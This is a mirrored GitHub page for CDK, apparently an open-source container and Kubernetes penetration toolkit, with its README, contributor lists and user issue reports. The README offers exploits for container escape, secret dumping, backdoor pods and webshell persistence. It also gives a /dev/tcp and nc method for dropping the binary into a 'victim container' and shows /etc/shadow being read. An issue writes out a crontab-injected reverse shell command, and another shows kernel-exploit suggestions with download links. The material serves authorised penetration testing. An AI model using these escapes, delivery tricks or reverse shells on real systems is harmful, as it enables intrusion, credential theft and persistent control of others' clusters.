Git Product home page Git Product logo

cdk's Introduction

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

png

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

Quick Start

Run cdk eva to get evaluate info and a recommend exploit, then run cdk run to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistance and lateral movement
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command will run the scripts below without local file scanning, using --full to enable all.

Tactics Script Supported Usage/Example
Information Gathering OS Basic Info link
Information Gathering Available Capabilities link
Information Gathering Available Linux Commands link
Information Gathering Mounts link
Information Gathering Net Namespace link
Information Gathering Sensitive ENV link
Information Gathering Sensitive Process link
Information Gathering Sensitive Local Files link
Information Gathering Kube-proxy Route Localnet(CVE-2020-8558) link
Information Gathering DNS-Based Service Discovery link
Discovery K8s Api-server Info link
Discovery K8s Service-account Info link
Discovery Cloud Provider Metadata API link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
Tactic Technique CDK Exploit Name Supported In Thin Doc
Escaping docker-runc CVE-2019-5736 runc-pwn
Escaping containerd-shim CVE-2020-15257 shim-pwn link
Escaping docker.sock PoC (DIND attack) docker-sock-check link
Escaping docker.sock RCE docker-sock-pwn link
Escaping Docker API(2375) RCE docker-api-pwn link
Escaping Device Mount Escaping mount-disk link
Escaping LXCFS Escaping lxcfs-rw link
Escaping Cgroups Escaping mount-cgroup link
Escaping Abuse Unprivileged User Namespace Escaping CVE-2022-0492 abuse-unpriv-userns link
Escaping Procfs Escaping mount-procfs link
Escaping Ptrace Escaping PoC check-ptrace link
Escaping Rewrite Cgroup(devices.allow) rewrite-cgroup-devices link
Escaping Read arbitrary file from host system (CAP_DAC_READ_SEARCH) cap-dac-read-search link
Discovery K8s Component Probe service-probe link
Discovery Dump Istio Sidecar Meta istio-check link
Discovery Dump K8s Pod Security Policies k8s-psp-dump link
Remote Control Reverse Shell reverse-shell link
Remote Control Kubelet Exec kubelet-exec
Credential Access Registry BruteForce registry-brute link
Credential Access Access Key Scanning ak-leakage link
Credential Access Etcd Get K8s Token etcd-get-k8s-token
Credential Access Dump K8s Secrets k8s-secret-dump link
Credential Access Dump K8s Config k8s-configmap-dump link
Privilege Escalation K8s RBAC Bypass k8s-get-sa-token link
Persistence Deploy WebShell webshell-deploy link
Persistence Deploy Backdoor Pod k8s-backdoor-daemonset link
Persistence Deploy Shadow K8s api-server k8s-shadow-apiserver link
Persistence K8s MITM Attack (CVE-2020-8554) k8s-mitm-clusterip link
Persistence Deploy K8s CronJob k8s-cronjob link

Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.

Tool Module

Running commands like in Linux, little different in input-args, see the usage link.

cdk nc [options]
cdk ps
Command Description Supported Usage/Example
nc TCP Tunnel link
ps Process Information link
netstat Like "netstat -antup" command
ifconfig Network Information link
vi Edit Files link
ectl Unauthorized enumeration of ectd keys
kcurl Request to K8s api-server link
dcurl Request to Docker HTTP API link
ucurl Request to Docker Unix Socket link
rcurl Request to Docker Registry API
probe IP/Port Scanning link

Release Document

If you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the Release Document.

Developer Docs

Contributing to CDK

First off, thanks for taking the time to contribute!

Thanks for the following contributors:

More contributors:Contributors List

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
  • Running screenshots or logs before and after you fix the problem.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please enable a sustainable environment for us to review contributions.
  • Screenshots about how this new feature works.
  • If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an example.

Events

404StarLink 2.0 - Galaxy

png

Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

BlackHat Asia 2021 Arsenal

HITB SecConf 2021 Amsterdam

WHC 2021 (补天白帽大会)

KCON 2021 Arsenal

Kubernetes community Days 2021

cdk's People

Contributors

404tk avatar alex-null avatar brant-ruan avatar dependabot[bot] avatar dvkunion avatar fang-li avatar greenhandatsjtu avatar homelanmder avatar kingkaki avatar kmahyyg avatar neargle avatar nikitastupin avatar testwill avatar verctor avatar wall1e avatar wywwzjj avatar xyntax avatar yeahx avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

willie-lin binihao5bei lurans dekoder brewlee crisisera hcncn6 functfan sry309 bitterzzzz fdlucifer m4d3bug huangzccn kllay ze4lfrog 0x6b7966 pt001 l34rner xeyelab ver007 bailongwang1 omiter fadinglr hissec luwikes amjiyu mrwq jweny selfevo pyking desmax74 skysliently windghoul le-shi jeromeji uglyliu jasonlou neargle yanshu911 rebootorz whoamiecho ethancck crackercat sunu11 lp008 heartway changheluor007 p0p0p0 ldbfpiaoran yut0u wjskate lsr00ter wengangji fzxcp3 ellerbrock unsecureio fiveaourthe iwanglei1 rajivraj freeide jack51706 zha0 yeahx incredibleindishell jihwanjeon origing findcool nevinhappy skyroot coolboy43 raystyle cream-sec lanvnal vihcle whizsail caijiji xiaobei97 luisrain 5l1v3r1 ldong2014 nidaodishishui istoliving tk4s brianwrf alio0820 l4inoday victor0013 flachi1109 long-zhu landscape2024 zgq346712481 secxzy tiaotiao97 kartfran lyy0755 report090 yq9721 not-today websec123 aiaicaow

cdk's Issues

mountinfo 数组长度溢出

请详细描述你遇到的问题 (Please describe the issue in detail)

Note: 提交issue前,请检查你所使用的CDK是否是最新版,有些BUG我们新版本已经修复啦。
Before submitting an issue, please check whether the CDK you are using is the latest version, otherwise there may be some bugs that have been fixed in latest version.

附加信息(Additional Information)

1、您执行 cdk evaluate --full 的返回结果是?(Full output of your execution of cdk evaluate --full)

$ ./cdk evaluate --full

2、请贴出完整错误信息,可以是命令行输出、软件报错信息、截图等。(Please post the full error message, which can be command line output, software error message, screenshots, etc.)

注意,请贴出完整错误信息,不要只粘贴错误的最后一行!Attention, please post the full error message, don't paste the last line of the error only!

[  Information Gathering - Mounts  ]
panic: runtime error: index out of range [2] with length 2

goroutine 1 [running]:
github.com/cdk-team/CDK/pkg/util.GetMountInfo(0x0, 0x0, 0x0, 0x0, 0x0)
        /home/runner/work/CDK/CDK/pkg/util/cgroup.go:113 +0x7f7
github.com/cdk-team/CDK/pkg/evaluate.MountEscape()
        /home/runner/work/CDK/CDK/pkg/evaluate/check_mount_escape.go:40 +0x28
github.com/cdk-team/CDK/pkg/evaluate.CallBasics()
        /home/runner/work/CDK/CDK/pkg/evaluate/evaluate.go:39 +0x94
github.com/cdk-team/CDK/pkg/cli.ParseCDKMain(0xa048070)
        /home/runner/work/CDK/CDK/pkg/cli/parse.go:75 +0x1b2
main.main()
        /home/runner/work/CDK/CDK/cmd/cdk/cdk.go:27 +0x1a

exploit模块下runc-pwn直接退出

问题描述

执行runc-pwn模块,报出cannot find RunC process inside container, exit.之后,直接退出,没发生任何事就Finished。

在87行的if判断中直接return退出了函数,导致宿主机还没来得及执行exec命令,目标容器就已经退出了pid的监听。一开始宿主机创建容器时runc执行完就退出了,无法获取runc的pid。

CDK/pkg/exploit/docker_runc.go

Lines 87 to 90 in b0ca845

if found == -1 {
fmt.Println("\tcannot find RunC process inside container, exit.")
return
}

附加信息(Additional Information)

1、执行 cdk evaluate --full 的返回结果

$ ./cdk evaluate --full

CDK (Container DucK)
CDK Version(GitCommit):
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[  Information Gathering - System Info  ]
2023/03/12 02:16:25 current dir: /
2023/03/12 02:16:25 current user: root uid: 0 gid: 0 home: /root
2023/03/12 02:16:25 hostname: 807f6b85cc1e
2023/03/12 02:16:25 debian ubuntu 18.04 kernel: 4.4.0-210-generic
2023/03/12 02:16:25 Setuid files found:
        /usr/bin/chfn
        /usr/bin/chsh
        /usr/bin/gpasswd
        /usr/bin/newgrp
        /usr/bin/passwd
        /bin/mount
        /bin/su
        /bin/umount

[  Information Gathering - Services  ]

[  Information Gathering - Commands and Capabilities  ]
2023/03/12 02:16:25 available commands:
        find,ps,apt,dpkg,mount,fdisk,base64,perl
2023/03/12 02:16:25 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
        CapInh: 00000000a80425fb
        CapPrm: 00000000a80425fb
        CapEff: 00000000a80425fb
        CapBnd: 00000000a80425fb
        CapAmb: 0000000000000000
        Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:

[  Information Gathering - Mounts  ]
0:41 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/YCLLF3QMOQWI6RXE5WOEML3MWH:/var/lib/docker/overlay2/l/T75S3NZRBNEIAZ6L3SOODUELSG:/var/lib/docker/overlay2/l/TQUPTPF5JE77BTN7SPW3C4EZ2C:/var/lib/docker/overlay2/l/HXM2EF5BE7N4OJVLYPMFSUAT2X,upperdir=/var/lib/docker/overlay2/c1946e06500cb5afce2ebe698b81e2996dbb67c3b38e23fa225aeb8e3a457cf7/diff,workdir=/var/lib/docker/overlay2/c1946e06500cb5afce2ebe698b81e2996dbb67c3b38e23fa225aeb8e3a457cf7/work
0:44 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:45 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:46 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:47 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:48 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:23 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd
0:25 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:26 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:27 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:28 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:29 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:30 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:31 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:32 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:33 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:34 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:43 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/vda1 rw,data=ordered
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/hostname /etc/hostname rw,relatime - ext4 /dev/vda1 rw,data=ordered
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/hosts /etc/hosts rw,relatime - ext4 /dev/vda1 rw,data=ordered
0:42 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
0:46 /0 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:44 /bus /proc/bus ro,relatime - proc proc rw
0:44 /fs /proc/fs ro,relatime - proc proc rw
0:44 /irq /proc/irq ro,relatime - proc proc rw
0:44 /sys /proc/sys ro,relatime - proc proc rw
0:44 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
0:45 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:49 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:50 / /sys/firmware ro,relatime - tmpfs tmpfs ro

[  Information Gathering - Net Namespace  ]
        container net namespace isolated.

[  Information Gathering - Sysctl Variables  ]
2023/03/12 02:16:25 net.ipv4.conf.all.route_localnet = 0

[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 223.5.5.5:53: no such host
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 223.5.5.5:53: no such host

[  Discovery - K8s API Server  ]
2023/03/12 02:16:25 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
        api-server forbids anonymous request.
        response:

[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[  Discovery - Cloud Provider Metadata API  ]
2023/03/12 02:16:25 failed to dial Alibaba Cloud API.
2023/03/12 02:16:26 failed to dial Azure API.
2023/03/12 02:16:26 failed to dial Google Cloud API.
2023/03/12 02:16:26 failed to dial Tencent Cloud API.
        OpenStack Metadata API available in http://169.254.169.254/openstack/latest/meta_data.json
        Docs: https://docs.openstack.org/nova/rocky/user/metadata-service.html
        Amazon Web Services (AWS) Metadata API available in http://169.254.169.254/latest/meta-data/
        Docs: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html
2023/03/12 02:16:27 failed to dial ucloud API.

[  Exploit Pre - Kernel Exploits  ]
2023/03/12 02:16:27 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-27365] linux-iscsi

   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: less probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4997] target_offset

   Details: https://www.exploit-db.com/exploits/40049/
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
   Comments: ip_tables.ko needs to be loaded

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working



[  Information Gathering - Sensitive Files  ]
        .dockerenv - /.dockerenv
        /.bashrc - /etc/skel/.bashrc
        /.bashrc - /root/.bashrc

[  Information Gathering - ASLR  ]
2023/03/12 02:16:29 /proc/sys/kernel/randomize_va_space file content: 2
2023/03/12 02:16:29 ASLR is enabled.

[  Information Gathering - Cgroups  ]
2023/03/12 02:16:29 /proc/1/cgroup file content:
        11:pids:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        10:memory:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        9:cpuset:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        8:perf_event:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        7:hugetlb:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        6:cpu,cpuacct:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        5:net_cls,net_prio:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        4:blkio:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        3:devices:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        2:freezer:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        1:name=systemd:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
2023/03/12 02:16:29 /proc/self/cgroup file added content (compare pid 1) :

2、完整错误信息

root@807f6b85cc1e:/# ./cdk run runc-pwn "echo 'hello,host' > /tmp/haha.escape"
2023/03/12 02:15:28 THIS EXPLOIT WILL OVERWRITE RUNC BINARY AND BREAK CI/CD, BACKUP YOUR RUNC BINARY FIRST!
2023/03/12 02:15:28 Shellcode will be trigger when an execve() call in container or the container is manually stopped.
2023/03/12 02:15:28 Exploit CVE-2019-5736 with shellcode commands:  echo 'hello,host' > /tmp/haha.escape
[0xc0001ccb60 0xc0001ccc30 0xc0001c81a0 0xc0001c9ba0 0xc00008dc70 0xc0001c8f70 0xc0001c9040 0xc0001c9790 0xc0001c9110 0xc0001c8a90 0xc0001c91e0 0xc0001c9c70 0xc00008dd40 0xc0001c8b60 0xc0001cc340 0xc00008dad0 0xc0001cc410 0xc00008dba0 0xc0001c9ee0 0xc0001c8750 0xc0001c92b0 0xc00008de10 0xc0001c9860 0xc0001c8820 0xc0001c9d40 0xc0001c8270 0xc0001c8340 0xc0001cc4e0 0xc0001cc000 0xc0001cc0d0 0xc0001c9380 0xc0001c88f0 0xc0001c8c30 0xc0001c9450 0xc0001c8410 0xc0001c9520 0xc0001c8d00 0xc0001c84e0 0xc00008dee0 0xc0001cc750 0xc0001cc1a0 0xc0001cc5b0 0xc0001c9e10 0xc0001c85b0 0xc0001cc9c0 0xc0001c9930 0xc0001c9a00 0xc0001c8680 0xc0001c89c0 0xc0001c8000 0xc0001cc820 0xc0001c95f0 0xc0001cca90 0xc0001cc270 0xc0001c80d0 0xc0001c8dd0 0xc0001c96c0 0xc0001cc8f0 0xc0001cc680 0xc0001c8ea0 0xc0001c9ad0]
/bin/bash
./cdkrunrunc-pwnecho 'hello,host' > /tmp/haha.escape
        cannot find RunC process inside container, exit.
2023/03/12 02:15:28 Finished.

mount-cgroup执行命令时的拼接问题处置 

root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab"
2023/10/17 04:25:59 current cgroup for exploit: memory 
